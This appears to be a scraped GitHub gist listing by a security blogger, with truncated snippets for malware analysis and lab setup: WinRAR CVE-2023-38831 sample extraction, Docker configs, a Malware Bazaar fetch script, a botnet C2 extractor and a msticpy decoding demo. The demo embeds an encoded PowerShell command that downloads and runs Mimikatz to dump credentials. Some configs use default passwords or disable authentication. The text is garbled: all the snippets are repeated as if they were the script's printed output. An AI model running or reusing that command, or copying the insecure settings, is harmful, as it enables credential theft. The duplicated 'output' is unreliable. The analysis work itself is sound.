boredhackerblog BoredHackerBlog

## winrar_CVE-2023-38831_extract_cmd.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                BoredHackerBlog
                / winrar_CVE-2023-38831_extract_cmd.md
            
            
              Last active
              August 24, 2023 16:06
            
              
                Extracting malicious command file from rar file exploiting CVE-2023-38831
              
          
    Article with details regarding the vuln and malicious use & file hashes: https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
File: 049af32f678da5e344315ce46787e8fc
Anyrun: https://app.any.run/tasks/3c2f3ff4-3883-4f68-98d1-706138771f46
remnux@remnux:~/Downloads$ md5sum malware.rar 
a519226ff8e4edd6d622db45a0099932  malware.rar
remnux@remnux:~/Downloads$ 7z l malware.rar |grep -v ico

  
## docker-compose.yml
version: "3.6"

services:
  so1:
    image: splunk/splunk:latest
    container_name: so1
    environment:
      - SPLUNK_START_ARGS=--accept-license
      - SPLUNK_PASSWORD=password
      - SPLUNK_LICENSE_URI=Free

## guac_token.py
import requests

GUAC_URL="http://10.0.0.1:8080/guacamole"
GUAC_USERNAME="user"
GUAC_PASSWORD="password"

def get_token():
  url = f"{GUAC_URL}/api/tokens"
  payload = f"username={GUAC_USERNAME}&password={GUAC_PASSWORD}"
  headers = {"Content-Type": "application/x-www-form-urlencoded"}

## docker-compose.yml
version: '3'
services:
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:8.8.0
    container_name: elasticsearch
    environment:
      - xpack.security.enabled=false #there is no password to access ES!!
      - xpack.security.enrollment.enabled=false
      - discovery.type=single-node
    ulimits:

## Caddyfile
:80 {
	reverse_proxy :9000 {
		header_up +Remote-User "anonymous"
	}
}


## docker-compose.yml
version: "3.9"

services:
    cloudflared:
        image: cloudflare/cloudflared:latest
        network_mode: "service:gluetun"
        command: tunnel --no-autoupdate --url http://localhost:3000

#webtop
    webtop:

## ha_ingest.py
# ingest data from hybrid analysis
import requests
import psycopg2

HA_API = ""
ha_header = {'api-key':HA_API, 'user-agent': 'Falcon Sandbox', 'accept': 'application/json'}

POSTGRES_HOST = "localhost"
POSTGRES_DB = "procsearch"
POSTGRES_SEARCH_USER = "postgres"

## abusech_malware_bazaar_hourly.sh
#!/bin/bash
# prolly use cron w/ '10 * * * *' so it runs every hour, at hour:10mins

hourlyfile=$(date -u --date="1 hour ago" +%Y-%m-%d-%H).zip
wget https://datalake.abuse.ch/malware-bazaar/hourly/$hourlyfile -O /tmp/hourly.zip
unzip -P infected -o /tmp/hourly.zip -d /tmp/hourly_files
# do stuff with the files
file /tmp/hourly_files/* >> /tmp/file_out.txt
# do stuff with the files
rm -rf /tmp/hourly_files /tmp/hourly.zip

## extractor.py
#Gafgyt/qbot C2 extractor
#https://bazaar.abuse.ch/browse/signature/Gafgyt/
#The file needs to be unpacked (usually packed with upx)
import re
import sys

# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html
ipv4_zero = b"\x00(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})\x00"
ipv4_e9 = b"\xe9(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})\x00"

## msticpy_b64_unpack.py
from msticpy.nbtools import *
from msticpy.sectools import *

command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="

out = base64.unpack(command)

print(out[1]['decoded_string'][0])

# it should print
	version: "3.6"

	services:
	so1:
	image: splunk/splunk:latest
	container_name: so1
	environment:
	- SPLUNK_START_ARGS=--accept-license
	- SPLUNK_PASSWORD=password
	- SPLUNK_LICENSE_URI=Free
	import requests

	GUAC_URL="http://10.0.0.1:8080/guacamole"
	GUAC_USERNAME="user"
	GUAC_PASSWORD="password"

	def get_token():
	url = f"{GUAC_URL}/api/tokens"
	payload = f"username={GUAC_USERNAME}&password={GUAC_PASSWORD}"
	headers = {"Content-Type": "application/x-www-form-urlencoded"}
	version: '3'
	services:
	elasticsearch:
	image: docker.elastic.co/elasticsearch/elasticsearch:8.8.0
	container_name: elasticsearch
	environment:
	- xpack.security.enabled=false #there is no password to access ES!!
	- xpack.security.enrollment.enabled=false
	- discovery.type=single-node
	ulimits:
	:80 {
	reverse_proxy :9000 {
	header_up +Remote-User "anonymous"
	}
	}
	version: "3.9"

	services:
	cloudflared:
	image: cloudflare/cloudflared:latest
	network_mode: "service:gluetun"
	command: tunnel --no-autoupdate --url http://localhost:3000

	#webtop
	webtop:
	# ingest data from hybrid analysis
	import requests
	import psycopg2

	HA_API = ""
	ha_header = {'api-key':HA_API, 'user-agent': 'Falcon Sandbox', 'accept': 'application/json'}

	POSTGRES_HOST = "localhost"
	POSTGRES_DB = "procsearch"
	POSTGRES_SEARCH_USER = "postgres"
	#!/bin/bash
	# prolly use cron w/ '10 * * * *' so it runs every hour, at hour:10mins

	hourlyfile=$(date -u --date="1 hour ago" +%Y-%m-%d-%H).zip
	wget https://datalake.abuse.ch/malware-bazaar/hourly/$hourlyfile -O /tmp/hourly.zip
	unzip -P infected -o /tmp/hourly.zip -d /tmp/hourly_files
	# do stuff with the files
	file /tmp/hourly_files/* >> /tmp/file_out.txt
	# do stuff with the files
	rm -rf /tmp/hourly_files /tmp/hourly.zip
	#Gafgyt/qbot C2 extractor
	#https://bazaar.abuse.ch/browse/signature/Gafgyt/
	#The file needs to be unpacked (usually packed with upx)
	import re
	import sys

	# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html
	ipv4_zero = b"\x00(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?):(\d{0,5})\x00"
	ipv4_e9 = b"\xe9(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?):(\d{0,5})\x00"
	from msticpy.nbtools import *
	from msticpy.sectools import *

	command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="

	out = base64.unpack(command)

	print(out[1]['decoded_string'][0])

	# it should print